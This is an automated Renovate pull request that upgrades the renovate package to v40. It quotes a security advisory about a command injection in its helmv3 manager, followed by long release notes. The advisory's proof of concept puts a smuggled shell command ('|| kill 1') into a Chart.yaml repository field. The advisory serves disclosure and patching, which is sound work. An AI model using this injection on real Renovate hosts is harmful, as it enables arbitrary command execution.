
chore(deps): update dependency renovate to v40 [security]#209

Open
renovate[bot] wants to merge 1 commit into master from renovate/npm-renovate-vulnerability

Conversation


@renovate renovate bot commented Jan 13, 2026

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package             Change               Age   Confidence
renovate (source)   32.17.1 -> 40.33.0   age   confidence

GitHub Vulnerability Alerts

GHSA-3f44-xw83-3pmg

Summary

The user-provided string repository in the helmv3 manager is appended to the helm registry login command without proper sanitization.

Details

Adversaries can provide a maliciously crafted Chart.yaml in conjunction with a tweaked Renovate configuration file to trick Renovate into executing arbitrary code.
The values for both uses of the repository variable in lib/modules/manager/helmv3/common.ts are not escaped using the quote function from the shlex package.
This lack of proper sanitization has been present in the product since version 31.51.0 (renovatebot/renovate@f372a68), released on January 24, 2022.

PoC

  1. Create a git repo with the following content:

renovate.json5:

{
  $schema: "https://docs.renovatebot.com/renovate-schema.json",
  customDatasources: {
    always: {
      defaultRegistryUrlTemplate: "https://docs.renovatebot.com/search/search_index.json",
      transformTemplates: ['{"releases":[{"version":"99999.0.0"}]}'],
    },
  },
  // Register any credentials to make the manager attempt to use basic auth for the Helm registry
  hostRules: [
    {
      matchHost: "charts.bitnami.com",
      username: "un",
      password: "pw",
    },
  ],
  packageRules: [
    {
      // Target of the day
      matchManagers: ["helmv3"],
      // Don't consult the actual bitnami repo
      registryUrls: [],
      // But still, trick the manager in believing there's a new version
      overrideDatasource: "custom.always",
    },
  ],
}

Chart.yaml:

apiVersion: v2
name: renovate-aci-1
version: 0.0.1
dependencies:
  - name: redis
    version: 0.1.0
    repository: oci://charts.bitnami.com/bitnami || kill 1

Chart.lock:

dependencies:
- name: redis
  repository: oci://charts.bitnami.com/bitnami

  2. Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting "Repository finished", because the ACI vulnerability allowed for execution of kill 1, terminating the root process of the container.

Note

This specific proof of concept was made a lot simpler with the introduction of the overrideDatasource configuration since version 38.120.0 (renovatebot/renovate@a70a6a3), released on October 12 of 2024, because it means that there is no more need for a proper response from an actual Helm registry on the malformed repository URL.

Impact

This is an Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.

Severity
  • CVSS Score: 6.7 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Release Notes

renovatebot/renovate (renovate)

v40.33.0

Compare Source

Features
Bug Fixes
Documentation
  • faq: add explanation of differences between depName and packageName (#​36063) (06d0e7c)
Miscellaneous Chores
  • deps: update otel/opentelemetry-collector-contrib docker tag to v0.127.0 (main) (#​36183) (c3a6a73)

v40.32.7

Compare Source

Bug Fixes

v40.32.6

Compare Source

Build System

v40.32.5

Compare Source

Build System

v40.32.4

Compare Source

Build System

v40.32.3

Compare Source

Miscellaneous Chores
Build System

v40.32.2

Compare Source

Build System

v40.32.1

Compare Source

Bug Fixes
Build System

v40.32.0

Compare Source

Features
Bug Fixes

v40.31.1

Compare Source

Bug Fixes
Documentation
Miscellaneous Chores
Build System
  • deps: update opentelemetry-js monorepo to v0.201.1 (main) (#​36155) (84c32c7)

v40.31.0

Compare Source

Features
Miscellaneous Chores
  • deps: update dependency markdownlint-cli2 to v0.18.1 (main) (#​36003) (7aeef48)

v40.30.2

Compare Source

Bug Fixes

v40.30.1

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.70.5 (main) (#​36134) (f33ff65)
Miscellaneous Chores
  • deps: update dependency eslint-import-resolver-typescript to v4.3.5 (main) (#​36131) (b55efa9)
  • deps: update ghcr.io/containerbase/devcontainer docker tag to v13.8.31 (main) (#​36133) (a42de8f)

v40.30.0

Compare Source

Features
Documentation
Miscellaneous Chores

v40.29.1

Compare Source

Bug Fixes

v40.29.0

Compare Source

Features
  • cache: Experimental env var to disable HTTP memory cache (#​36124) (f478e1d)

v40.28.0

Compare Source

Features

v40.27.1

Compare Source

Bug Fixes
  • manager/fleet: Make name optional for target customizations in FleetFile schema (#​36085) (90d8b7d)

v40.27.0

Compare Source

Features
Documentation
  • aws-eks-addon: add configuration snippet for sane commit/pr mes… (#​36111) (279ac5f)

v40.26.3

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.70.4 (main) (#​36120) (2673514)

v40.26.2

Compare Source

Documentation
Miscellaneous Chores
Build System
  • deps: update dependency semantic-release to v24.2.4 (main) (#​36116) (7ff2d41)

v40.26.1

Compare Source

Bug Fixes

v40.26.0

Compare Source

Features
Miscellaneous Chores

v40.25.2

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.70.3 (main) (#​36100) (1dffa07)

v40.25.1

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.70.2 (main) (#​36099) (3e58761)
Miscellaneous Chores

v40.25.0

Compare Source

Features
  • terraform: add support for docker_registry_image data source (#​35537) (6ba08ec)
Miscellaneous Chores

v40.24.3

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.70.1 (main) (#​36094) (dfa58c8)

v40.24.2

Compare Source

Miscellaneous Chores
Build System

v40.24.1

Compare Source

Build System

v40.24.0

Compare Source

Features
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.70.0 (main) (#​36089) (c490cca)
Miscellaneous Chores

v40.23.2

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.69.1 (main) (#​36087) (26c1550)

v40.23.1

Compare Source

Miscellaneous Chores
  • deps: update dependency typescript-eslint to v8.32.1 (main) (#​36029) (c08f724)
Build System

v40.23.0

Compare Source

Features

v40.22.1

Compare Source

Bug Fixes
Miscellaneous Chores

v40.22.0

Compare Source

Features
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.69.0 (main) (#​36079) (937260d)
Miscellaneous Chores

v40.21.7

Compare Source

Bug Fixes
  • gradle: include registryType and content during registry deduplication (#​36071) (5d4ae53)

v40.21.6

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.68.3 (main) (#​36074) (a43b702)

v40.21.5

Compare Source

Build System

v40.21.4

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.68.2 (main) (#​36068) (f6d0e88)
Miscellaneous Chores
  • deps: update docker/dockerfile docker tag to v1.16.0 (main) (#​36067) (ba6dd3e)
Build System

v40.21.3

Compare Source

Bug Fixes

v40.21.2

Compare Source

Bug Fixes

v40.21.1

Compare Source

Bug Fixes
Miscellaneous Chores

v40.21.0

Compare Source

Features
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.68.1 (main) (#​36055) (2f9efcd)

v40.20.0

Compare Source

Features
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.67.0 (main) (#​36053) (388d318)
Miscellaneous Chores
  • deps: update ghcr.io/containerbase/devcontainer docker tag to v13.8.29 (main) (#​36051) (f22dfb3)

v40.19.2

Compare Source

Bug Fixes
  • manager/npm): Revert "fix(manager/npm: search for npmrc in the root directory" (#​36049) (0d7255e)
Miscellaneous Chores

v40.19.1

Compare Source

Bug Fixes

v40.19.0

Compare Source

Features
Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.66.2 (main) (#​36041) (601ec93)
Miscellaneous Chores
  • deps: update containerbase/internal-tools action to v3.10.39 (main) (#​36039) (b51aae9)
  • deps: update ghcr.io/containerbase/devcontainer docker tag to v13.8.28 (main) (#​36038) (7d56785)

v40.18.3

Compare Source

Bug Fixes

v40.18.2

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.66.1 (main) (#​36037) (5190613)

v40.18.1

Compare Source

Build System
  • deps: update dependency openpgp to v6.1.1 [security] (main) (#​36033) (7b4a15b)

v40.18.0

Compare Source

Features
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.66.0 (main) (#​36031) (61b7887)

v40.17.1

Compare Source

Build System

v40.17.0

Compare Source

Features

v40.16.0

Compare Source

Features

v40.15.0

Compare Source

Features
  • cache: Use repository cache instead of memory cache for GitHub presets (#​35999) (74a3fcb)
Documentation
Miscellaneous Chores

v40.14.6

Compare Source

Bug Fixes

v40.14.5

Compare Source

Build System

v40.14.4

Compare Source

Bug Fixes
Documentation
Miscellaneous Chores
  • deps: update containerbase/internal-tools action to v3.10.36 (main) (#​36001) (9da2ec0)

v40.14.3

Compare Source

Bug Fixes

v40.14.2

Compare Source

Bug Fixes
Code Refactoring

v40.14.1

Compare Source

Bug Fixes
  • manager/terraform: support subpath module for git-tags ref (#​35978) (c841ea1)
Miscellaneous Chores
  • deps: update prom/prometheus docker tag to v3.4.0 (main) (#​35992) (d7d9b4b)

v40.14.0

Compare Source

Features

v40.13.1

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.65.1 (main) (#​35990) (941ea58)
Miscellaneous Chores

v40.13.0

Compare Source

Features
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.65.0 (main) (#​35971) (bb3b1fb)

v40.12.4

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.64.16 (main) (#​35970) (a496bd3)

v40.12.3

Compare Source

Miscellaneous Chores
  • deps: update codecov/codecov-action action to v5.4.3 (main) (#​35968) (b7cc7d6)
Build System

v40.12.2

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.64.15 (main) (#​35966) (a4c0609)
Miscellaneous Chores
  • deps: update ghcr.io/containerbase/devcontainer docker tag to v13.8.27 (main) (#​35967) (0aa05ba)

v40.12.1

Compare Source

Build System

v40.12.0

Compare Source

Features
Bug Fixes
  • datasource/docker: ignore unknown sub-manifests in OciImageIndexManifest (#​35950) (d8fdc4f)
Documentation
Miscellaneous Chores

v40.11.19

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.64.14 (main) (#​35952) (214d758)
Miscellaneous Chores
Build System

v40.11.18

Compare Source

Miscellaneous Chores
Build System
  • deps: update dependency better-sqlite3 to v11.10.0 (main) (#​35943) (5610c07)

v40.11.17

Compare Source

Documentation
Build System

v40.11.16

Compare Source

Miscellaneous Chores
Build System

v40.11.15

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.64.13 (main) (#​35934) (56e8b7f)
Miscellaneous Chores
  • deps: update dependency eslint-config-prettier to v10.1.3 (main) (#​35929) (fe4abd8)

v40.11.14

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.64.12 (main) (#​35928) (6a65156)
Miscellaneous Chores

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate bot requested a review from toondaey as a code owner January 13, 2026 20:33
@renovate renovate bot added dependencies Pull requests that update a dependency file major-update labels Jan 13, 2026
@renovate renovate bot changed the title chore(deps): update dependency renovate to v40 [security] chore(deps): update dependency renovate to v40 [security] - autoclosed Mar 27, 2026
@renovate renovate bot closed this Mar 27, 2026
@renovate renovate bot deleted the renovate/npm-renovate-vulnerability branch March 27, 2026 01:29
@renovate renovate bot changed the title chore(deps): update dependency renovate to v40 [security] - autoclosed chore(deps): update dependency renovate to v40 [security] Mar 30, 2026
@renovate renovate bot reopened this Mar 30, 2026
@renovate renovate bot force-pushed the renovate/npm-renovate-vulnerability branch 2 times, most recently from 454895c to 71d33bf Compare March 30, 2026 18:02